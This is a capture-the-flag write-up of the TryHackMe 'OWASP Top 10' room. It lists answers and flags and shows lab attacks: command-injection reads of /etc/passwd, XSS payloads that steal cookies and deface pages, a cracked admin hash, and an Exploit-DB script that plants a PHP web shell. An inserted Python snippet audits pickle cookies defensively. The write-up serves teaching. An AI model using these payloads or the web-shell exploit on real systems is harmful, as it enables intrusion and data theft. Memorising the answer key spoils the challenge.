OWASP TOP 10 - WRITE-UP - TRYHACKME

Saturday 14 November 2020 (2020-11-14)
Thursday 4 August 2022 (2022-08-04)
noraj (Alexandre ZANNI)
eop, idor, linux, owasp, thm, web, writeups, xxe


INFORMATION


ROOM

 * Name: OWASP Top 10
 * Profile: tryhackme.com
 * Difficulty: Easy
 * Description: Learn about and exploit each of the OWASP Top 10
   vulnerabilities; the 10 most critical web security risks.



WRITE-UP


OVERVIEW

Install the tools used in this write-up on BlackArch Linux:

$ sudo pacman -S exploitdb dbeaver python



[DAY 1] COMMAND INJECTION PRACTICAL


#1

> What strange text file is in the website root directory?

Answer: drpepper.txt

Issue the ls command to list files.

css drpepper.txt evilshell.php index.php js



#2

> How many non-root/non-service/non-daemon users are there?

Answer: 0

Issue the cat /etc/passwd command: there are no
non-root/non-service/non-daemon users.

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin



#3

> What user is this app running as?

Answer: www-data

Issue the id command.

uid=33(www-data) gid=33(www-data) groups=33(www-data)



#4

> What is the user's shell set as?

Answer: /usr/sbin/nologin

echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut -d ':' -f 7.

/usr/sbin/nologin



#5

> What version of Ubuntu is running?

Answer: 18.04.4

Run cat /etc/os-release.

VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic



#6

> Print out the MOTD. What favorite beverage is shown?

Answer: DR PEPPER

List the MOTD scripts in /etc/update-motd.d/ and read the header script.

$ ls -1 /etc/update-motd.d/
10-help-text
50-landscape-sysinfo
50-motd-news
80-esm
80-livepatch
90-updates-available
91-release-upgrade
92-unattended-upgrades
95-hwe-eol
97-overlayroot
98-fsck-at-reboot
98-reboot-required

$ cat /etc/update-motd.d/00-header
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
	# Fall back to using the very slow lsb_release utility
	DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

DR PEPPER MAKES THE WORLD TASTE BETTER!



[DAY 2] BROKEN AUTHENTICATION PRACTICAL


#1

> What is the flag that you found in darren's account?

Register as darren and log in.

Answer: fe86079416a21a3c99937fea8874b667


#3

> What is the flag that you found in arthur's account?

Register as arthur and log in.

Answer: d9ac0f7db4fda460ac3edeb75d75e16e


[DAY 3] SENSITIVE DATA EXPOSURE (CHALLENGE)


#1

> Have a look around the webapp. The developer has left themselves a note
> indicating that there is sensitive data in a specific directory.
> 
> What is the name of the mentioned directory?

Answer: /assets


#2

> Navigate to the directory you found in question one. What file stands out as
> being likely to contain sensitive data?

Answer: webapp.db


#3

> Use the supporting material to access the sensitive data. What is the password
> hash of the admin user?

Answer: 6eea9b7ef19179a06954edd0f6c05ceb

Open the database with DBeaver.


#4

> Crack the hash. What is the admin's plaintext password?

Answer: qwertyuiop

Crack the hash with CrackStation.


#5

> Login as the admin. What is the flag?

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}


[DAY 4] XML EXTERNAL ENTITY - EXTENSIBLE MARKUP LANGUAGE


#1

> Full form of XML

Answer: eXtensible Markup Language


#2

> Is it compulsory to have XML prolog in XML documents?

Answer: no


#3

> Can we validate XML documents against a schema?

Answer: yes


#4

> How can we specify XML version and encoding in XML document?

Answer: XML Prolog


[DAY 4] XML EXTERNAL ENTITY - DTD


#1

> How do you define a new ELEMENT?

Answer: !ELEMENT


#2

> How do you define a ROOT element?

Answer: !DOCTYPE


#3

> How do you define a new ENTITY?

Answer: !ENTITY


[DAY 4] XML EXTERNAL ENTITY - EXPLOITING


#3

> What is the name of the user in /etc/passwd

Answer: falcon


#4

> Where is falcon's SSH key located?

Answer: /home/falcon/.ssh/id_rsa


#5

> What are the first 18 characters for falcon's private key

Answer: MIIEogIBAAKCAQEA7b


[DAY 5] BROKEN ACCESS CONTROL (IDOR CHALLENGE)


#3

> Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: flag{fivefourthree}


[DAY 6] SECURITY MISCONFIGURATION


#2

> Hack into the webapp, and find the flag!

https://github.com/NinjaJc01/PensiveNotes

Answer: thm{4b9513968fd564a87b28aa1f9d672e17}


[DAY 7] CROSS-SITE SCRIPTING


#2

> Go to http://10.10.93.135/reflected and craft a reflected XSS payload that
> will cause a popup saying "Hello".

Answer: ThereIsMoreToXSSThanYouThink

<script>alert("Hello")</script>



#3

> On the same reflective page, craft a reflected XSS payload that will cause a
> popup with your machine's IP address.

<script>alert(window.location.hostname)</script>


Answer: ReflectiveXss4TheWin


#4

> Now navigate to http://10.10.93.135/stored and make an account.
>
> Then add a comment and see if you can insert some of your own HTML.

<b>noraj is bold</b>


Answer: HTML_T4gs


#5

> On the same page, make an alert popup box appear on the page with your
> document cookies.

<script>alert(document.cookie)</script>


Answer: W3LL_D0N3_LVL2s


#6

> Change "XSS Playground" to "I am a hacker" by adding a comment and using
> Javascript.

<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>


Answer: websites_can_be_easily_defaced_with_xss


[DAY 8] INSECURE DESERIALIZATION


#1

> Who developed the Tomcat application?

Answer: The Apache Software Foundation


#2

> What type of attack that crashes services can be performed with insecure
> deserialization?

Answer: denial of service


[DAY 8] INSECURE DESERIALIZATION - OBJECTS


#1

> Select the correct term of the following statement:

Answer: A Behaviour


[DAY 8] INSECURE DESERIALIZATION - DESERIALIZATION


#1

> What is the name of the base-2 formatting that data is sent across a network
> as?

Answer: binary


[DAY 8] INSECURE DESERIALIZATION - COOKIES


#1

> If a cookie had the path of webapp.com/login , what would the URL that the
> user has to visit be?

Answer: webapp.com/login


#2

> What is the acronym for the web technology that Secure cookies work over?

Answer: HTTPS


[DAY 8] INSECURE DESERIALIZATION - COOKIES PRACTICAL


#1

> 1st flag (cookie value)

Answer: THM{good_old_base64_huh}

$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
}q(X    sessionIdqX c7dc44838e0847b1b45544948a92d194qX
                                                      encodedflagqXTHM{good_old_base64_huh}qu.
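The cookie above is a base64-encoded Python pickle, which is why the flag falls straight out of base64 -d. As an added example (not part of the original write-up), here is how a defender can inspect such a cookie without executing it and load only plain data; the only input is the cookie value quoted above, and the function and class names are my own.

```python
import base64
import io
import pickle
import pickletools

# Session cookie captured in the room (copied from the write-up above).
COOKIE = "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg=="

# Opcodes that import or call code during unpickling. A plain session dict of
# strings never needs them, so their presence in a cookie is a detection signal.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ",
                "NEWOBJ_EX", "BUILD"}


def audit_cookie(value: str) -> list:
    """Disassemble the pickle WITHOUT executing it; report code-bearing opcodes."""
    data = base64.b64decode(value)
    return [f"{op.name}@{pos}" for op, _arg, pos in pickletools.genops(data)
            if op.name in CODE_OPCODES]


class NoImportUnpickler(pickle.Unpickler):
    """Unpickler that refuses every class/function lookup, so only data loads."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refused to import {module}.{name}")


def load_session(value: str) -> dict:
    """Decode the cookie into a dict, rejecting anything that is not plain data."""
    suspicious = audit_cookie(value)
    if suspicious:
        raise pickle.UnpicklingError("code-bearing opcodes: " + ", ".join(suspicious))
    session = NoImportUnpickler(io.BytesIO(base64.b64decode(value))).load()
    if not isinstance(session, dict):
        raise pickle.UnpicklingError("session payload is not a dict")
    return session


def rejects_class_reference() -> bool:
    """Show the gate firing: pickling the builtin type str emits a GLOBAL opcode."""
    tainted = base64.b64encode(pickle.dumps(str, protocol=3)).decode()
    try:
        load_session(tainted)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print(audit_cookie(COOKIE))        # []
    print(load_session(COOKIE))
    print(rejects_class_reference())   # True
```

The real fix is not to pickle session state at all (a signed JSON cookie or a server-side session id carries the same data); the gate above is what you run while you still have to read cookies that are already out there.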



#2

> 2nd flag (admin dashboard)

Answer: THM{heres_the_admin_flag}


[DAY 8] INSECURE DESERIALIZATION - REMOTE CODE EXECUTION


#1

> flag.txt

Answer: 4a69a7ff9fd68


[DAY 9] COMPONENTS WITH KNOWN VULNERABILITIES - LAB

> How many characters are in /etc/passwd (use wc -c /etc/passwd to get the
> answer)

Answer: 1611

$ searchsploit CSE bookstore
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                      | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                                           | php/webapps/48960.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit online book store
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities                                | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                                    | php/webapps/47922.txt
Online Book Store 1.0 - 'id' SQL Injection                                          | php/webapps/48775.txt
Online Book Store 1.0 - Arbitrary File Upload                                       | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution                       | php/webapps/47887.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 47887
  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47887
     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
File Type: ASCII text, with CRLF line terminators

$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ wc -c /etc/passwd
1611 /etc/passwd



[DAY 10] INSUFFICIENT LOGGING AND MONITORING

> What IP address is the attacker using?

Answer: 49.99.13.16

> What kind of attack is being carried out?

Answer: brute force
